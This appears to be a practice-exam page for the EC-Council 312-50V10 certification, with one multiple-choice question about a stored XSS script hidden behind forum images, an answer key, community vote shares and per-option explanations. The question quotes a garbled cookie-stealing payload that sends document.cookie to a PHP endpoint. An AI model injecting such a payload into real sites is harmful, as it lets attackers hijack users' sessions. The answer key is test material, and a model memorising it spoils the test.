nerdexam
EC-Council

312-50V10 · Question #816

Judy created a forum, one day. she discovers that a user is posting strange images without writing comments. She immediately calls a security expert, who discovers that the following code is hidden be

The correct answer is D. This php file silently executes the code and grabs the users session cookie and session ID.. A stored XSS payload hidden in a forum image silently steals session cookies from users who interact with it.

Hacking Web Applications

Question

Judy created a forum, one day. she discovers that a user is posting strange images without writing comments. She immediately calls a security expert, who discovers that the following code is hidden behind those images:

<script> document.writef<img src="https://Ioca(host/submitcookie.php? cookie ='+ escape(document.cookie)+ " />); </script> What issue occurred for the users who clicked on the image?

Options

  • AThe code inject a new cookie to the browser.
  • BThe code redirects the user to another site.
  • CThe code is a virus that is attempting to gather the users username and password.
  • DThis php file silently executes the code and grabs the users session cookie and session ID.

How the community answered

(64 responses)
  • A
    9% (6)
  • B
    5% (3)
  • C
    14% (9)
  • D
    72% (46)

Why each option

A stored XSS payload hidden in a forum image silently steals session cookies from users who interact with it.

AThe code inject a new cookie to the browser.

The code reads existing cookies via document.cookie but never writes or injects new cookies into the browser.

BThe code redirects the user to another site.

No redirect occurs - the attack silently exfiltrates cookie data through a crafted image src request without navigating the browser to another site.

CThe code is a virus that is attempting to gather the users username and password.

The script targets session cookies specifically, not login credentials such as username and password, and it is a stored XSS payload rather than a self-replicating virus.

DThis php file silently executes the code and grabs the users session cookie and session ID.Correct

The injected script uses document.cookie to capture the active session cookie and transmits it to a remote PHP endpoint (submitcookie.php) via a hidden image src request, effectively stealing the session ID without user awareness. This allows the attacker to hijack authenticated sessions by replaying the stolen cookie.

Concept tested: Stored XSS session cookie theft via script injection

Source: https://owasp.org/www-community/attacks/xss/

Topics

#XSS#cross-site scripting#cookie theft#session hijacking

Community Discussion

No community discussion yet for this question.

Full 312-50V10 Practice